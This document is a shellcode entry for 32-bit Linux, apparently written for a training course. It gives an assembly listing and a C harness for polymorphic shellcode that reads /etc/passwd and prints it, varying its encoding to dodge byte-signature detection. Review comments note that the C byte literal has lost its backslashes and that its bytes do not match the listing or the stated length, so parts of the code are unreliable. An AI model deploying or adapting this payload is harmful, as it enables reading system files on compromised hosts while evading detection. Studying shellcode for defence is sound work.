# Title: Linux/x86 - Tiny Read Polymorphic Shellcode (75 bytes)
# Author: Xenofon Vassilakopoulos
# Date: 2020-01-09
# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux
# Blog: https://xenovass.wordpress.com/2019/06/26/slae-assignment-6-create-polymorphic-shellcode/
# Architecture: i686 GNU/Linux
# Shellcode Length: 75 bytes
# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-842.php
# SLAE-ID: SLAE - 1314
# Description: polymorphic version of tiny read shellcode that reads /etc/passwd

----------------------------------- Assembly -------------------------------------

; Syntax: NASM (Intel operand order). Target: 32-bit Linux, int 0x80 syscall
; interface (eax = syscall number, args in ebx, ecx, edx).
; Purpose (per the page description): open /etc/passwd, read it onto the
; stack, write the buffer out and exit. Nothing here returns to a caller.
; Only the instruction encoding is varied; at the syscall level the process
; still performs open/read/write/exit, which is what syscall-level monitoring
; observes regardless of the byte pattern.
global _start

section .text

_start:

; --- open(path, flags, mode): eax = 5 ---
; ecx = upper 16 bits of its entry value. NOTE(review): this is zero only if
; ecx was below 0x10000 on entry; everything that follows assumes ecx == 0.
shr ecx, 16
; edx:eax = eax * ecx, so with ecx == 0 both eax and edx become 0.
mul ecx
; eax = 5 (open on i386), given eax was just zeroed.
mov al, 5
; Build the string below the current stack pointer, highest dword first.
; ecx (presumed 0) doubles as the NUL terminator and as flags = 0 (O_RDONLY).
; NOTE(review): these stores land below esp before esp is lowered; i386 has
; no red zone, so an asynchronous signal here could overwrite them.
mov dword [esp-4], ecx
; bytes 73 73 77 64 = "sswd"
mov dword [esp-8], 0x64777373
; bytes 63 2f 70 61 = "c/pa"
mov dword [esp-0ch], 0x61702f63
; bytes 2f 2f 65 74 = "//et"  -> full string "//etc/passwd"
mov dword [esp-10h], 0x74652f2f
; Claim the 16 bytes just written; esp now points at the path.
sub esp, 10h
; ebx = pathname argument.
mov ebx, esp
; edx = 0x1bc (octal 0674) as the mode argument; open() ignores mode when
; O_CREAT is not set, so this value has no effect with flags = 0.
mov dx, 0x1bc
int 0x80

; --- read(fd, buf, 4095): eax = 3 ---
; ecx = buffer = the same stack address that held the path; the read
; overwrites the path and up to 4095 bytes of stack above it.
mov ecx, ebx
; ebx = value returned by open. NOTE(review): not checked; on failure this
; is a negative errno and the following calls operate on an invalid fd.
mov ebx, eax

; Only al is written: eax becomes 3 only if the returned fd fits in one byte
; and the upper bytes of eax are zero.
mov al, 3
; dx = 0xffe + 1 = 0xfff (4095); the upper half of edx is still 0 from mul.
mov dx, 0xffe
inc dx
int 0x80

; --- write(fd - 2, buf, 4095): eax = 4 ---
; The byte count returned by read is discarded here.
xor eax, eax
mov al, 4
; ebx = fd - 2. Presumably the fd from open was 3, making this 1 (stdout);
; any other fd value sends the output elsewhere.
sub bl, 2
; ecx and edx are unchanged, so all 4095 bytes of the buffer are written even
; if read returned fewer; the tail is whatever was on the stack.
int 0x80

; --- exit(ebx): eax = 1 ---
xor eax, eax
inc al
; ebx still holds fd - 2 and is used as the exit status.
int 0x80

----------------------------------- Shellcode -------------------------------------

#include <stdio.h>
#include <string.h>

/*
 * Byte string for the assembly listing, stored as a C string literal.
 *
 * NOTE(review): the "\x" escapes appear to have lost their backslashes when
 * this page was extracted; as written the literal is plain ASCII text
 * ("xc1xe9..."), not the encoded instructions.
 *
 * NOTE(review): read as hex pairs the literal holds 76 bytes, not the 75
 * stated in the header. The difference is the second-to-last instruction:
 * the bytes decode as `shr eax, 16` (c1 e8 10) where the listing has
 * `xor eax, eax` (31 c0). The listing and the bytes apparently come from
 * different revisions; confirm which one the stated length refers to.
 */
unsigned char code[] =
"xc1xe9x10xf7xe1xb0x05x89x4cx24xfcxc7"
"x44x24xf8x73x73x77x64xc7x44x24xf4x63"
"x2fx70x61xc7x44x24xf0x2fx2fx65x74x83"
"xecx10x89xe3x66xbaxbcx01xcdx80x89xd9"
"x89xc3xb0x03x66xbaxfex0fx66x42xcdx80"
"x31xc0xb0x04x80xebx02xcdx80xc1xe8x10"
"xfexc0xcdx80";

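/*
 * Test harness: prints the length of `code`, then calls the array as a
 * function.
 *
 * The call jumps into a data object. Where data pages are mapped
 * non-executable (NX / W^X), the call faults instead of running the bytes;
 * the harness only demonstrates the payload on a build without that
 * protection.
 *
 * Returns 0 if the call ever returns; the payload in the listing ends with an
 * exit syscall, so normally it does not.
 */
int main(void)
{
    /*
     * strlen() returns size_t, so the conversion is %zu rather than %d.
     * It stops at the first zero byte, so the figure is the payload size
     * only when the payload contains no NUL.
     */
    printf("Shellcode Length: %zu ", strlen((const char *)code));

    /*
     * The payload leaves through a raw exit syscall, which bypasses stdio's
     * exit-time flush; without this the length line can be lost.
     */
    fflush(stdout);

    int (*ret)(void) = (int (*)(void))code;

    ret();
    return 0;
}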